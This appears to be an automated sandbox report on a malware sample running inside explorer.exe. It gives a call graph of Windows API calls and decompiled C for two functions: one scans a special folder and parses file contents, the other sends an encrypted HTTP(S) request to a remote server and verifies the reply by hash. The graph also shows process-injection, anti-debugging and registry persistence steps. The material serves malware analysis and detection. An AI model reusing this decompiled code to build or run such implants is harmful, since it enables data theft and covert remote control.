3796 7c1404 CryptHashData 3795->3796 3797 7c6292 3796->3797 3915 7c1490 3797->3915 3802 7c1b20 CryptReleaseContext 3803 7c62c4 3802->3803 3804 7c62db 3803->3804 3805 7c62fd 3803->3805 3921 7c1440 GetProcessHeap HeapFree 3804->3921 3923 7c1440 GetProcessHeap HeapFree 3805->3923 3924 7c151c InternetCloseHandle 3808->3924 3809 7c62e3 3922 7c1440 GetProcessHeap HeapFree 3809->3922 3811->3699 3812->3701 
3813->3703 3815 7c3ed5 RegCreateKeyExA 3814->3815 3816 7c3eaf RegCreateKeyExA 3814->3816 3817 7c3ef9 3815->3817 3816->3817 3824 7c38b0 RegQueryValueExA 3817->3824 3819 7c3f16 3825 7c3890 RegCloseKey 3819->3825 3821 7c3f2f 3822 7c5468 GetSystemTime 3821->3822 3823 7c5480 3822->3823 3823->3707 3824->3819 3825->3821 3829 7c54cb 3826->3829 3827 7c560f 3832 7c5858 3827->3832 3830 7c5567 3829->3830 3927 7c1844 wsprintfA 3829->3927 3830->3827 3928 7c1844 wsprintfA 3830->3928 3833 7c17e8 CryptAcquireContextA 3832->3833 3834 7c5877 3833->3834 3929 7c153c 3834->3929 3837 7c1b20 CryptReleaseContext 3838 7c588f 3837->3838 3838->3715 3840 7c1801 CryptAcquireContextA 3839->3840 3841 7c181e 3839->3841 3840->3841 3842 7c18a0 3841->3842 3843 7c18da 3842->3843 3844 7c18b9 CryptImportKey 3842->3844 3845 7c1ab0 3843->3845 3844->3843 3846 7c1aee 3845->3846 3847 7c1ac9 CryptEncrypt 3845->3847 3848 7c1af8 3846->3848 3847->3846 3849 7c1b0b CryptDestroyKey 3848->3849 3850 7c1b18 3848->3850 3849->3850 3851 7c1b20 3850->3851 3852 7c1b47 3851->3852 3853 7c1b36 CryptReleaseContext 3851->3853 3852->3726 3853->3852 3854->3728 3855->3730 3856->3732 3857->3734 3858->3736 3859->3738 3860->3739 3861->3742 3862->3745 3863->3750 3864->3744 3866 7c17e8 CryptAcquireContextA 3865->3866 3867 7c58bb 3866->3867 3868 7c18a0 CryptImportKey 3867->3868 3869 7c5904 3868->3869 3932 7c1574 3869->3932 3872 7c1574 CryptSetKeyParam 3873 7c5936 3872->3873 3874 7c5945 3873->3874 3876 7c5960 3873->3876 3875 7c1ab0 CryptEncrypt 3874->3875 3877 7c595e 3875->3877 3878 7c1ab0 CryptEncrypt 3876->3878 3879 7c1af8 CryptDestroyKey 3877->3879 3878->3877 3880 7c59a9 3879->3880 3881 7c1b20 CryptReleaseContext 3880->3881 3882 7c59b3 3881->3882 3883 7c13dc GetProcessHeap RtlAllocateHeap 3882->3883 3883->3755 3884->3756 3885->3758 3886->3808 3887->3764 3888->3767 3889->3775 3890->3775 3891->3776 3892->3776 3893->3808 3894->3782 3896 7c59e3 3895->3896 3897 7c59d6 3895->3897 3896->3897 3898 7c17e8 CryptAcquireContextA 3896->3898 
3897->3786 3899 7c5a0f 3898->3899 3900 7c18a0 CryptImportKey 3899->3900 3901 7c5a58 3900->3901 3902 7c1574 CryptSetKeyParam 3901->3902 3903 7c5a71 3902->3903 3935 7c17a4 3903->3935 3905 7c5a9c 3906 7c1af8 CryptDestroyKey 3905->3906 3907 7c5ad2 3906->3907 3908 7c1b20 CryptReleaseContext 3907->3908 3908->3897 3910 7c13aa 3909->3910 3911 7c138d CryptCreateHash 3909->3911 3912 7c1404 3910->3912 3911->3910 3913 7c141d CryptHashData 3912->3913 3914 7c1436 3912->3914 3913->3914 3914->3792 3916 7c14c6 3915->3916 3917 7c14a9 CryptGetHashParam 3915->3917 3918 7c14d0 3916->3918 3917->3916 3919 7c14e3 CryptDestroyHash 3918->3919 3920 7c14f0 3918->3920 3919->3920 3920->3802 3921->3809 3922->3808 3923->3808 3924->3768 3925->3771 3926->3709 3927->3829 3928->3830 3930 7c156a 3929->3930 3931 7c1555 CryptGenRandom 3929->3931 3930->3837 3931->3930 3933 7c15a6 3932->3933 3934 7c158d CryptSetKeyParam 3932->3934 3933->3872 3934->3933 3936 7c17de 3935->3936 3937 7c17bd CryptDecrypt 3935->3937 3936->3905 3937->3936 3938->3675 5507 7c5d1c 5508 7c6332 5507->5508 5509 7c5d38 5507->5509 5509->5508 5510 7c54b8 wsprintfA 5509->5510 5511 7c5dde 5510->5511 5512 7c5858 3 API calls 5511->5512 5513 7c5dee 5512->5513 5514 7c5858 3 API calls 5513->5514 5515 7c5dfe 5514->5515 5516 7c17e8 CryptAcquireContextA 5515->5516 5517 7c5e5f 5516->5517 5518 7c18a0 CryptImportKey 5517->5518 5519 7c5e77 5518->5519 5520 7c1ab0 CryptEncrypt 5519->5520 5521 7c5e9d 5520->5521 5522 7c1af8 CryptDestroyKey 5521->5522 5523 7c5ea5 5522->5523 5524 7c1b20 CryptReleaseContext 5523->5524 5525 7c5eaf 5524->5525 5611 7c3864 InternetOpenA 5525->5611 5527 7c5ed6 5612 7c170c InternetSetOptionA 5527->5612 5529 7c5ef2 5613 7c170c InternetSetOptionA 5529->5613 5531 7c5f0b 5614 7c170c InternetSetOptionA 5531->5614 5533 7c5f24 5615 7c170c InternetSetOptionA 5533->5615 5535 7c5f36 5616 7c170c InternetSetOptionA 5535->5616 5537 7c5f4f 5539 7c5f76 5537->5539 5617 7c170c InternetSetOptionA 5537->5617 5609 7c161c InternetConnectA 5539->5609 
5541 7c5fa8 5618 7c1660 HttpOpenRequestA 5541->5618 5543 7c6050 5545 7c6056 5543->5545 5546 7c60b0 5543->5546 5544 7c6013 5544->5543 5619 7c16d8 InternetQueryOptionA 5544->5619 5548 7c5894 6 API calls 5545->5548 5622 7c13dc GetProcessHeap RtlAllocateHeap 5546->5622 5551 7c606d 5548->5551 5549 7c6037 5620 7c170c InternetSetOptionA 5549->5620 5621 7c13dc GetProcessHeap RtlAllocateHeap 5551->5621 5553 7c60ae 5610 7c15e4 HttpSendRequestA 5553->5610 5555 7c607a 5558 7c5894 6 API calls 5555->5558 5557 7c60f6 5559 7c60fa 5557->5559 5560 7c6107 5557->5560 5558->5553 5623 7c1440 GetProcessHeap HeapFree 5559->5623 5624 7c1440 GetProcessHeap HeapFree 5560->5624 5563 7c610f 5625 7c39cc HttpQueryInfoA 5563->5625 5566 7c6138 5581 7c6102 5566->5581 5626 7c13dc GetProcessHeap RtlAllocateHeap 5566->5626 5567 7c6322 5636 7c151c InternetCloseHandle 5567->5636 5570 7c632a 5637 7c151c InternetCloseHandle 5570->5637 5573 7c61c5 5575 7c61d8 5573->5575 5576 7c61cb 5573->5576 5574 7c614f 5574->5573 5574->5581 5627 7c16a4 InternetQueryDataAvailable 5574->5627 5628 7c1460 GetProcessHeap RtlReAllocateHeap 5574->5628 5629 7c15b0 InternetReadFile 5574->5629 5631 7c13dc GetProcessHeap RtlAllocateHeap 5575->5631 5630 7c1440 GetProcessHeap HeapFree 5576->5630 5580 7c61e1 5582 7c59bc 6 API calls 5580->5582 5635 7c151c InternetCloseHandle 5581->5635 5584 7c620f 5582->5584 5585 7c17e8 CryptAcquireContextA 5584->5585 5586 7c6222 5585->5586 5587 7c1374 CryptCreateHash 5586->5587 5588 7c6237 5587->5588 5589 7c1404 CryptHashData 5588->5589 5590 7c624c 5589->5590 5591 7c1404 CryptHashData 5590->5591 5592 7c6261 5591->5592 5593 7c1404 CryptHashData 5592->5593 5594 7c627e 5593->5594 5595 7c1404 CryptHashData 5594->5595 5596 7c6292 5595->5596 5597 7c1490 CryptGetHashParam 5596->5597 5598 7c62b2 5597->5598 5599 7c14d0 CryptDestroyHash 5598->5599 5600 7c62ba 5599->5600 5601 7c1b20 CryptReleaseContext 5600->5601 5602 7c62c4 5601->5602 5603 7c62db 5602->5603 5604 7c62fd 5602->5604 5632 7c1440 GetProcessHeap 
HeapFree 5603->5632 5634 7c1440 GetProcessHeap HeapFree 5604->5634 5607 7c62e3 5633 7c1440 GetProcessHeap HeapFree 5607->5633 5609->5541 5610->5557 5611->5527 5612->5529 5613->5531 5614->5533 5615->5535 5616->5537 5617->5539 5618->5544 5619->5549 5620->5543 5621->5555 5622->5553 5623->5581 5624->5563 5625->5566 5626->5574 5627->5574 5628->5574 5629->5574 5630->5581 5631->5580 5632->5607 5633->5581 5634->5581 5635->5567 5636->5570 5637->5508 5252 7c8a44 5253 7c8a5d PostQuitMessage 5252->5253 5254 7c8a56 5252->5254 5259 7c8a79 5253->5259 5255 7c8a6c 5254->5255 5256 7c8a5b NtdllDefWindowProc_A 5254->5256 5258 7c78fc 56 API calls 5255->5258 5256->5259 5258->5259 5638 7c584c 5639 7c5858 5638->5639 5640 7c17e8 CryptAcquireContextA 5639->5640 5641 7c5877 5640->5641 5642 7c153c CryptGenRandom 5641->5642 5643 7c5885 5642->5643 5644 7c1b20 CryptReleaseContext 5643->5644 5645 7c588f 5644->5645 5646 7c9147 5647 7c9149 5646->5647 5648 7c69bc 12 API calls 5647->5648 5649 7c9166 5648->5649 5260 7c6ece 5261 7c6ed3 5260->5261 5273 7c6f1c 5260->5273 5264 7c6ed5 5261->5264 5266 7c6ea4 5261->5266 5262 7c1994 2 API calls 5263 7c6f33 5262->5263 5265 7c1994 2 API calls 5263->5265 5267 7c3f38 2 API calls 5264->5267 5268 7c6f45 5265->5268 5288 7c1440 GetProcessHeap HeapFree 5266->5288 5269 7c6f04 LoadLibraryA 5267->5269 5270 7c1994 2 API calls 5268->5270 5289 7c1440 GetProcessHeap HeapFree 5269->5289 5275 7c6f57 5270->5275 5273->5262 5276 7c70c7 5273->5276 5274 7c6ec7 5277 7c1994 2 API calls 5275->5277 5278 7c6f69 SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 5277->5278 5279 7c12dc 5278->5279 5280 7c6fdf CharLowerBuffA SetupDiDestroyDeviceInfoList 5279->5280 5281 7c3f38 2 API calls 5280->5281 5282 7c7001 5281->5282 5283 7c701d SetupDiGetClassDevsA SetupDiEnumDeviceInfo SetupDiGetDeviceRegistryPropertyA 5282->5283 5284 7c12dc 5283->5284 5285 7c708e CharLowerBuffA SetupDiDestroyDeviceInfoList 5284->5285 5286 7c70b4 5285->5286 5290 7c1440 GetProcessHeap HeapFree 
5286->5290 5288->5274 5289->5273 5290->5276 5291 7c8977 5294 7c1440 GetProcessHeap HeapFree 5291->5294 5293 7c897f 5294->5293 5295 7c6cf0 5296 7c6cfc 5295->5296 5297 7c3f38 2 API calls 5296->5297 5298 7c6d0c 5297->5298 5301 7c1440 GetProcessHeap HeapFree 5298->5301 5300 7c6d36 5301->5300 5650 7c4960 5651 7c48dc 5650->5651 5652 7c498a SHGetValueA 5651->5652 5653 7c49bb RegOpenKeyExA 5652->5653 5654 7c4a12 5652->5654 5653->5654 5655 7c49da 5653->5655 5659 7c3930 RegSetValueExA 5655->5659 5657 7c49fb 5660 7c3890 RegCloseKey 5657->5660 5659->5657 5660->5654 5324 7c6cfc 5325 7c3f38 2 API calls 5324->5325 5326 7c6d0c 5325->5326 5329 7c1440 GetProcessHeap HeapFree 5326->5329 5328 7c6d36 5329->5328 5302 7c7118 5303 7c3f38 2 API calls 5302->5303 5304 7c7130 RegOpenKeyExA 5303->5304 5319 7c1440 GetProcessHeap HeapFree 5304->5319 5306 7c7155 5307 7c3f38 2 API calls 5306->5307 5308 7c7166 5307->5308 5320 7c38b0 RegQueryValueExA 5308->5320 5310 7c7185 5311 7c71bb 5310->5311 5313 7c3f38 2 API calls 5310->5313 5322 7c1440 GetProcessHeap HeapFree 5311->5322 5315 7c7196 5313->5315 5314 7c71c3 5323 7c3890 RegCloseKey 5314->5323 5321 7c1440 GetProcessHeap HeapFree 5315->5321 5317 7c71cb 5319->5306 5320->5310 5321->5311 5322->5314 5323->5317 5330 7c7982 5331 7c7984 GetVolumeInformationA 5330->5331 5661 7c6d64 5662 7c3f38 2 API calls 5661->5662 5663 7c6d79 GetModuleHandleA 5662->5663 5666 7c1440 GetProcessHeap HeapFree 5663->5666 5665 7c6d9a 5666->5665 5667 7c1402 5668 7c1404 5667->5668 5669 7c141d CryptHashData 5668->5669 5670 7c1436 5668->5670 5669->5670 5671 7c89d2 5672 7c89d4 GetVolumeInformationA 5671->5672 5673 7c8a0c 5672->5673 5332 7c82f4 5333 7c82f8 5332->5333 5334 7c8481 5333->5334 5335 7c833e 5333->5335 5346 7c8416 5334->5346 5355 7c7290 CreateThread CloseHandle 5334->5355 5337 7c8358 GetTempPathA 5335->5337 5335->5346 5338 7c7560 4 API calls 5337->5338 5339 7c8375 5338->5339 5340 7c83cd 5339->5340 5341 7c842b 5339->5341 5343 7c485c 4 API calls 5340->5343 5353 7c1828 
VirtualFree 5341->5353 5344 7c83de Sleep CreateProcessA 5343->5344 5344->5346 5347 7c841f 5344->5347 5345 7c843c 5354 7c13b4 VirtualAlloc 5345->5354 5352 7c7290 CreateThread CloseHandle 5347->5352 5349 7c8449 5351 7c8459 wsprintfA 5349->5351 5351->5346 5352->5346 5353->5345 5354->5349 5355->5346 5356 7c1860 wsprintfA 5674 7c41c8 5675 7c41cc GetCurrentThread OpenThreadToken 5674->5675 5676 7c4217 5675->5676 5677 7c41f4 GetLastError 5675->5677 5678 7c42cc 5676->5678 5689 7c13dc GetProcessHeap RtlAllocateHeap 5676->5689 5677->5676 5679 7c4201 GetCurrentProcess OpenProcessToken 5677->5679 5679->5676 5681 7c422b GetTokenInformation CloseHandle 5682 7c425a AllocateAndInitializeSid 5681->5682 5683 7c42c4 5681->5683 5684 7c42ba FreeSid 5682->5684 5685 7c4288 5682->5685 5690 7c1440 GetProcessHeap HeapFree 5683->5690 5684->5683 5685->5684 5687 7c4293 EqualSid 5685->5687 5687->5685 5688 7c42ac 5687->5688 5688->5684 5689->5681 5690->5678 5040 7c5614 5041 7c5635 5040->5041 5043 7c14f8 InternetGetConnectedState 5040->5043 5043->5041 5691 7c6d55 5692 7c6d64 5691->5692 5693 7c3f38 2 API calls 5692->5693 5694 7c6d79 GetModuleHandleA 5693->5694 5697 7c1440 GetProcessHeap HeapFree 5694->5697 5696 7c6d9a 5697->5696 5698 7c9347 5699 7c9349 GetCurrentProcess 5698->5699 5701 7c453c 2 API calls 5699->5701 5702 7c9364 5701->5702 5703 7c9391 GetWindowsDirectoryA 5702->5703 5704 7c9368 GetWindowsDirectoryA 5702->5704 5705 7c938c 5703->5705 5704->5705 5715 7c5028 5705->5715 5708 7c9459 ExitProcess 5709 7c93f9 SHGetSpecialFolderPathA 5710 7c133c 5709->5710 5711 7c941e PathFileExistsA 5710->5711 5711->5708 5712 7c9432 5711->5712 5713 7c5028 28 API calls 5712->5713 5714 7c9453 5713->5714 5714->5708 5716 7c503e GetModuleHandleA 5715->5716 5718 7c5049 5715->5718 5716->5718 5717 7c506e CreateProcessA 5719 7c52ce 5717->5719 5720 7c50a3 5717->5720 5718->5717 5719->5708 5719->5709 5721 7c50c4 CreateFileMappingA MapViewOfFile 5720->5721 5722 7c5124 5721->5722 5738 7c13b4 VirtualAlloc 5722->5738 5724 
7c5169 5725 7c4ef0 10 API calls 5724->5725 5726 7c51db 5725->5726 5727 7c5213 5726->5727 5730 7c51f4 GetThreadContext 5726->5730 5728 7c5233 5727->5728 5731 7c4de0 4 API calls 5727->5731 5728->5719 5729 7c5240 VirtualProtectEx WriteProcessMemory 5728->5729 5739 7c1828 VirtualFree 5729->5739 5730->5727 5731->5728 5733 7c527a ResumeThread 5734 7c528a WaitForSingleObject 5733->5734 5735 7c52ac 5733->5735 5734->5735 5737 7c529c GetExitCodeProcess 5734->5737 5736 7c52ba CloseHandle CloseHandle 5735->5736 5736->5719 5737->5736 5738->5724 5739->5733 5044 7c8bf8 RegOpenKeyExA 5048 7c8c4b 5044->5048 5051 7c38b0 RegQueryValueExA 5044->5051 5047 7c8c97 5053 7c3890 RegCloseKey 5047->5053 5052 7c38b0 RegQueryValueExA 5048->5052 5050 7c8ca2 5051->5048 5052->5047 5053->5050 5747 7c6900 GetComputerNameA 5748 7c694f RegOpenKeyExA 5747->5748 5752 7c6931 5747->5752 5754 7c38b0 RegQueryValueExA 5748->5754 5750 7c6992 5755 7c3890 RegCloseKey 5750->5755 5752->5748 5753 7c699d 5754->5750 5755->5753 5740 7c9178 5742 7c917a 5740->5742 5746 7c3b6c GetCommandLineA 5742->5746 5743 7c918f 5744 7c69bc 12 API calls 5743->5744 5745 7c919a 5744->5745 5746->5743 5756 7c9530 5757 7c9540 5756->5757 5760 7c9470 5757->5760 5759 7c9545 5761 7c90b8 18 API calls 5760->5761 5762 7c9479 CreateThread RtlExitUserThread 5761->5762 5762->5759 5763 7c9124 12 API calls 5762->5763 5357 7c92cd 5358 7c92cf GetModuleFileNameA 5357->5358 5364 7c7c50 CreateFileA 5358->5364 5362 7c69bc 12 API calls 5363 7c9335 5362->5363 5365 7c7c80 CreateFileA 5364->5365 5366 7c7c9c 5364->5366 5365->5366 5367 7c7ca2 ReadFile SetFilePointer ReadFile CloseHandle 5366->5367 5368 7c7cf3 wsprintfA GetCursorPos 5366->5368 5367->5368 5368->5362 5369 7c91fa 5370 7c91fc 5369->5370 5375 7c4a68 GetComputerNameA 5370->5375 5372 7c9216 5373 7c69bc 12 API calls 5372->5373 5374 7c921e 5373->5374 5376 7c4a95 5375->5376 5377 7c4aa3 RegOpenKeyExA 5375->5377 5376->5377 5393 7c38b0 RegQueryValueExA 5377->5393 5379 7c4ae6 5394 7c3890 RegCloseKey 5379->5394 
5381 7c4af1 5382 7c44f0 GetVersionExA 5381->5382 5383 7c4b12 GetCurrentProcess 5382->5383 5384 7c42d4 11 API calls 5383->5384 5385 7c4b22 5384->5385 5386 7c44f0 GetVersionExA 5385->5386 5387 7c4b2c 5386->5387 5388 7c4b41 GetCurrentProcess 5387->5388 5389 7c4b31 5387->5389 5390 7c42d4 11 API calls 5388->5390 5391 7c41cc 14 API calls 5389->5391 5392 7c4b36 5390->5392 5391->5392 5392->5372 5393->5379 5394->5381 5764 7c6d40 IsDebuggerPresent 5395 7c6dc8 GetTickCount 5396 7c6dd1 Sleep GetTickCount 5395->5396 5398 7c4406 5399 7c4408 InitializeSecurityDescriptor 5398->5399 5400 7c442d SetSecurityDescriptorDacl 5399->5400 5405 7c44bb 5399->5405 5401 7c4445 ConvertStringSecurityDescriptorToSecurityDescriptorA 5400->5401 5400->5405 5402 7c4463 GetSecurityDescriptorSacl 5401->5402 5401->5405 5403 7c4488 SetSecurityDescriptorSacl 5402->5403 5404 7c44a8 LocalFree 5402->5404 5403->5404 5403->5405 5404->5405

    Executed Functions

    Control-flow Graph

    C-Code - Quality: 92%
    			E007C5640(char* __eax, void* __ecx, void* __edx) {
    				char* _v8;
    				intOrPtr _v12;
    				void* _v16;
    				char _v20;
    				intOrPtr _v24;
    				char* _v28;
    				char* _v32;
    				struct _WIN32_FIND_DATAA _v352;
    				char _v609;
    				char _v866;
    				intOrPtr _t68;
    				void* _t73;
    				int _t81;
    				intOrPtr _t89;
    				void* _t93;
    				intOrPtr _t95;
    				intOrPtr _t127;
    				intOrPtr _t128;
    				intOrPtr _t131;
    				void* _t133;
    				void* _t134;
    				void* _t135;
    
    				_v8 = __eax;
    				_v12 = 0;
    				 *_v8 = 0;
    				 *0x7cb21c(0,  &_v609, 0x1a, 0xffffffff);
    				_t68 =  *0x7ca188; // 0x7c1e60
    				E007C133C( &_v609, _t68);
    				_t135 = _t134 + 8;
    				_v352.dwFileAttributes = 0x80;
    				_t73 = FindFirstFileA( &_v609,  &_v352); // executed
    				_v16 = _t73;
    				 *((char*)(_t133 + E007C12DC( &_v609) - 0x25e)) = 0;
    				if(_v16 == 0xffffffff) {
    					L12:
    					FindClose(_v16);
    					return _v12;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					if(_v352.cFileName == 0x2e) {
    						goto L11;
    					}
    					E007C1308( &_v866,  &_v609);
    					E007C133C( &_v866,  &(_v352.cFileName));
    					_t89 =  *0x7ca178; // 0x7c1e20
    					E007C133C( &_v866, _t89);
    					_t135 = _t135 + 0x10;
    					_t93 = E007C3988( &_v866); // executed
    					if(_t93 == 0) {
    						goto L11;
    					}
    					_t95 = E007C47AC( &_v866,  &_v20); // executed
    					_v24 = _t95;
    					if(_v24 <= 0) {
    						goto L11;
    					}
    					 *((char*)(_v20 + _v24)) = 0;
    					_t127 =  *0x7ca17c; // 0x7c1e2c
    					_v28 = E007C1110(_v20, _t127);
    					if(_v28 == 0) {
    						E007C1828(_v20); // executed
    						goto L11;
    					}
    					_v28 = _v28 + 0xd;
    					if( *_v28 == 0x31) {
    						_t128 =  *0x7ca180; // 0x7c1e3c
    						_v28 = E007C1110(_v20, _t128);
    						if(_v28 != 0) {
    							_v28 = _v28 + 0xe;
    							_v32 = E007C1110(_v28, E007C584C);
    							 *_v32 = 0;
    							E007C1308(_v8, _v28);
    							 *_v32 = 0x22;
    							_t131 =  *0x7ca184; // 0x7c1e4c
    							_v28 = E007C1110(_v20, _t131);
    							if(_v28 != 0) {
    								_v28 = _v28 + 0x12;
    								_v32 = E007C1110(_v28, 0x7c5850);
    								 *_v32 = 0;
    								E007C133C(_v8, 0x7c5854);
    								E007C133C(_v8, _v28);
    								_v12 = 0xffffffff;
    							}
    						}
    					}
    					E007C1828(_v20);
    					goto L12;
    					L11:
    					_t81 = FindNextFileA(_v16,  &_v352); // executed
    					asm("sbb eax, eax");
    				} while ( ~( ~_t81) != 0);
    				goto L12;
    			}

    APIs
    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,000000FF), ref: 007C5664
    • FindFirstFileA.KERNELBASE(?,00000080), ref: 007C5697
      • Part of subcall function 007C3988: FindFirstFileA.KERNELBASE(?,?), ref: 007C39A4
      • Part of subcall function 007C3988: FindClose.KERNEL32(000000FF), ref: 007C39BF
      • Part of subcall function 007C47AC: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 007C47D9
      • Part of subcall function 007C47AC: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 007C47FB
      • Part of subcall function 007C47AC: GetFileSize.KERNEL32(?,00000000), ref: 007C4810
      • Part of subcall function 007C47AC: ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007C483F
      • Part of subcall function 007C47AC: CloseHandle.KERNEL32(?), ref: 007C4849
      • Part of subcall function 007C1828: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,007C6A2F), ref: 007C183A
    • FindNextFileA.KERNELBASE(000000FF,00000080), ref: 007C5825
    • FindClose.KERNEL32(000000FF), ref: 007C583D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.28504861757.007C0000.00000040.sdmp, Offset: 007C0000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_7c0000_explorer.jbxd
    Yara matches
    C-Code - Quality: 98%
    			E007C5D20(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr* _a20, intOrPtr _a24, char _a28, intOrPtr* _a32, intOrPtr* _a36) {
    				signed int _v8;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				char _v24;
    				signed int _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				signed int _v76;
    				char _v168;
    				char _v184;
    				char _v200;
    				char _v204;
    				char _v269;
    				char _v285;
    				char _v301;
    				char _v317;
    				intOrPtr _v324;
    				intOrPtr _v328;
    				intOrPtr _v332;
    				char _v336;
    				char _v849;
    				intOrPtr _t239;
    				signed int _t250;
    				intOrPtr _t254;
    				char _t255;
    				intOrPtr _t256;
    				intOrPtr _t257;
    				intOrPtr _t259;
    				void* _t274;
    				signed int _t330;
    				intOrPtr _t436;
    				intOrPtr _t438;
    				void* _t470;
    
    				_v8 = 0;
    				if(_a16 == 0) {
    					L40:
    					return _v8;
    				}
    				_v64 = 0;
    				if(_a20 == 0) {
    					__eflags = 0;
    					_v28 = 0;
    					L9:
    					_v60 = E007C1110(_a16, E007C633C);
    					_t474 = _v60;
    					if(_v60 == 0) {
    						goto L40;
    					}
    					_v32 = _v60 - _a16;
    					E007C12B8( &_v269, _v32, _a16);
    					 *((char*)(_t470 + _v32 - 0x109)) = 0;
    					E007C1308( &_v849, _v60);
    					E007C54B8( &_v849, _v60, _t474);
    					E007C5858( &_v301, 0x10); // executed
    					E007C5858( &_v317, 0x10); // executed
    					E007C12B8( &_v184, 0x10,  &_v301);
    					E007C12B8( &_v200, 0x10,  &_v317);
    					_v204 = _a28;
    					if(_a12 != 0) {
    						E007C12B8( &_v168, 0x51, _a12);
    					}
    					E007C17E8( &_v48, 0, 0, 0xf0000000, 1); // executed
    					E007C18A0(_v48, 0x94, _a8,  &_v56, 0, 0);
    					_v32 = 0x75;
    					E007C1AB0(_v56, 0xffffffffffffffff, 0, 0x80,  &_v32,  &_v204, 0);
    					E007C1AF8(_v56);
    					E007C1B20(_v48, 0);
    					E007C1268( &_v204, 0x80);
    					_t239 =  *0x7ca1c0; // 0x7c1f00
    					_v12 = E007C3864(_t239, _v28, _v64, 0, 0);
    					_v28 = 1;
    					E007C170C(_v12,  &_v28, 0x46, 4);
    					_v28 = 0x1770;
    					E007C170C(_v12,  &_v28, 2, 4);
    					_v28 = 0x1f40;
    					E007C170C(_v12,  &_v28, 6, 4);
    					E007C170C(_v12,  &_v28, 5, 4);
    					_v28 = 1;
    					_t250 = E007C170C(_v12,  &_v28, 0x4d, 4);
    					asm("sbb eax, eax");
    					if( ~( ~_t250) == 0) {
    						_v76 = 1;
    						_v72 = 0;
    						E007C170C(0,  &_v76, 0x32, 8);
    					}
    					if(_a4 == 0) {
    						_v28 = 0x50;
    					} else {
    						_v28 = 0x1bb;
    					}
    					_t254 = E007C161C(_v12, _v28,  &_v269, 0, 0, 3, 0, 0); // executed
    					_v16 = _t254;
    					if(_a4 == 0) {
    						_v28 = 0x4600000;
    					} else {
    						_v28 = 0x4e03000;
    					}
    					_t255 =  *0x7ca1c4; // 0x7c1f48
    					_v336 = _t255;
    					_t256 =  *0x7ca1c8; // 0x7c1f54
    					_v332 = _t256;
    					_t257 =  *0x7ca1cc; // 0x7c1f6c
    					_v328 = _t257;
    					_v324 = 0;
    					_t259 =  *0x7ca23c; // 0x7c209c
    					_t436 =  *0x7ca1ac; // 0x7c1ed4
    					_v20 = E007C1660(_v16,  &_v849, _t436, 0, _v28,  &_v336, 0, _t259);
    					if(_a4 != 0) {
    						_v32 = 4;
    						E007C16D8(_v20,  &_v28, 0x1f,  &_v32);
    						_v28 = _v28 | 0x00000100;
    						E007C170C(_v20,  &_v28, 0x1f, 4);
    					}
    					_t482 = _a24;
    					if(_a24 == 0) {
    						_v68 = E007C13DC(_v32 + 0x80);
    						_t397 = 0x80;
    						E007C12B8(_v68, 0x80,  &_v204);
    						__eflags = 0;
    						_v32 = 0;
    					} else {
    						E007C5894(_a24,  &_v301, _a28, _t482,  &_v32, 0);
    						_v68 = E007C13DC(_v32 + 0x80);
    						E007C12B8(_v68, 0x80,  &_v204);
    						_t397 =  &_v301;
    						E007C5894(_a24,  &_v301, _a28, _t482,  &_v32, _v68 + 0x80);
    					}
    					_t438 =  *0x7ca1d0; // 0x7c1f70
    					_t274 = E007C15E4(_v20, _t397 | 0xffffffff, _t438, _v32 + 0x80, _v68); // executed
    					if(_t274 != 0) {
    						E007C1440(_v68);
    						_v32 = 4;
    						_v24 = 0;
    						_v28 = 0;
    						E007C39CC(_v20,  &_v24, 0x20000013,  &_v28,  &_v32);
    						__eflags = _v24 - 0x12e;
    						if(_v24 != 0x12e) {
    							goto L39;
    						}
    						_v40 = E007C13DC(0x1000);
    						__eflags = 0;
    						_v36 = 0;
    						while(1) {
    							_v44 = E007C16A4(_v20, 0,  &_v32, 0);
    							asm("sbb eax, eax");
    							__eflags =  ~( ~_v44);
    							if( ~( ~_v44) == 0) {
    								goto L39;
    							}
    							__eflags = _v44;
    							if(_v44 == 0) {
    								continue;
    							}
    							__eflags = _v32;
    							if(_v32 == 0) {
    								__eflags = _v36 - 0x20;
    								if(_v36 >= 0x20) {
    									 *_a32 = E007C13DC(_v36 + 1);
    									 *_a36 = _v36;
    									E007C59BC(_v40 + 0x10,  &_v317, _v36 - 0x10, _a36,  *_a32);
    									E007C17E8( &_v48, 0, 0, 0xf0000000, 1);
    									E007C1374(_v48, 0, 0x8003,  &_v52, 0);
    									E007C1404(_v52, 0x10,  &_v301, 0);
    									E007C1404(_v52, 0x10,  &_v317, 0);
    									E007C1404(_v52, E007C12DC( &_v269),  &_v269, 0);
    									E007C1404(_v52,  *_a36,  *_a32, 0);
    									_v32 = 0x10;
    									E007C1490(_v52,  &_v285, 2, 0,  &_v32);
    									E007C14D0(_v52);
    									E007C1B20(_v48, 0);
    									_t330 = E007C11F8( &_v285, 0x10, _v40);
    									__eflags = _t330;
    									if(_t330 != 0) {
    										E007C1440(_v40);
    										 *((char*)( *_a32 +  *_a36)) = 0;
    										_v8 = 0xffffffff;
    									} else {
    										E007C1440(_v40);
    										E007C1440( *_a32);
    										 *_a32 = 0;
    										 *_a36 = 0;
    									}
    								} else {
    									E007C1440(_v40);
    								}
    								goto L39;
    							}
    							__eflags = _v36 + _v32 - 0x200000;
    							if(_v36 + _v32 > 0x200000) {
    								goto L39;
    							}
    							_v40 = E007C1460(_v40, _v36 + _v32);
    							E007C15B0(_v20, _v32, _v40 + _v36,  &_v32);
    							_v36 = _v36 + _v32;
    						}
    						goto L39;
    					} else {
    						E007C1440(_v68);
    						L39:
    						E007C151C(_v20);
    						E007C151C(_v16);
    						E007C151C(_v12);
    						goto L40;
    					}
    				}
